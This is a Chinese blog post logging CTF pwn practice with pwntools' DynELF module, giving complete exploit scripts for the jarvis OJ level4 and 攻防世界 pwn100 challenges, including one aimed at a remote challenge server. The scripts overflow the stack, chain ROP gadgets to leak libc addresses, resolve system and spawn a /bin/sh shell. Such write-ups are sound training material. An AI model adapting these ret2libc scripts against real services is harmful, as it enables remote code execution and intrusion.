DynELF模块刷题记录

jarvis OJ level4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
elf = ELF('./level4')
r = process('./level4')

write_plt = elf.plt['write']
read_plt = elf.plt['read']
main = elf.symbols['main']
bss = elf.bss()
pppt = 0x08048509
def leak(address):
payload = 'a'*140 + p32(write_plt) + p32(main) + p32(1) +p32(address) + p32(4)
r.send(payload)
data = r.recv(4)
return data
d = DynELF(leak,elf=ELF('./level4'))
systemAdress = d.lookup('system','libc')
payload = 'a'*140 + p32(read_plt) + p32(pppt) + p32(0) + p32(bss) + p32(8) + p32(systemAdress) + p32(main) + p32(bss)
r.send(payload)
payload = '/bin/sh'
r.send(payload)
r.interactive()

攻防世界pwn100

这个题,对萌新一点也不友好,本以为就是个套路题,结果被坑了
首先看下保护机制

1
2
3
4
5
6
*] '/home/xiy/\xe4\xb8\x8b\xe8\xbd\xbd/pwn/pwn100'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

开启了NX保护,就不能想着shellcode了,得想想system(‘/bin/sh’)扔IDA
c1.png
c2.png
c3.png
看上面那张图,首先他有一个栈溢出漏洞,然后。还不能直接溢出,当字节为200才能跳出循环。为啥是200,看下图
c4.png
ok,看下字符串,啥子都没
c5.png
还要我怎样,能怎样,萌新内心有点慌,只能泄露地址喽

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
#r = process('./pwn100')
elf = ELF('./pwn100')
r = remote('111.198.29.45',55352)
puts = elf.plt['puts']
read = elf.got['read']
start = 0x400550
bss = 0x601000
pop_rdi = 0x0400763
gadget1 = 0x40075a
gadget2 = 0x400740

def leak(address):
count = 0
up = ''
data = ''
payload = 'a'*72 + p64(pop_rdi) + p64(address) + p64(puts) + p64(start)
payload = payload.ljust(200,'b')
r.send(payload)
r.recvuntil('bye~\n')
while True:
c = r.recv(numb=1,timeout=0.1)
count += 1
if up == '\n' and c == "":
data = data[:-1]+'\x00'
break
else:
data += c
up = c
data = data[:4]
return data
d = DynELF(leak,elf=ELF('./pwn100'))
systemAdress = d.lookup('system', 'libc')

payload = 'a'*72
payload += p64(gadget1)
payload += p64(0)
payload += p64(1)
payload += p64(read)
payload += p64(8)
payload += p64(bss)
payload +=p64(0)
payload +=p64(gadget2)
payload += 'a'*56
payload += p64(start)
payload = payload.ljust(200,'b')


r.send(payload)
r.recvuntil('bye~\n')
r.send('/bin/sh\x00')

payload = 'a'*72
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(systemAdress)
payload = payload.ljust(200,'b')

r.send(payload)
r.interactive()

一样的模块,不一样的函数,64位的程序,真香
我开始用ELF模块自己寻找bss段,结果不行,最后手动找了下。
然后在本地调试拿到shell之后,输入命令没有用但是连接远程却ok了。

  • 版权声明: 本博客所有文章除特别声明外,均采用 Apache License 2.0 许可协议。转载请注明出处!
  • © 2020 丰年de博客

请我喝杯咖啡吧~

支付宝
微信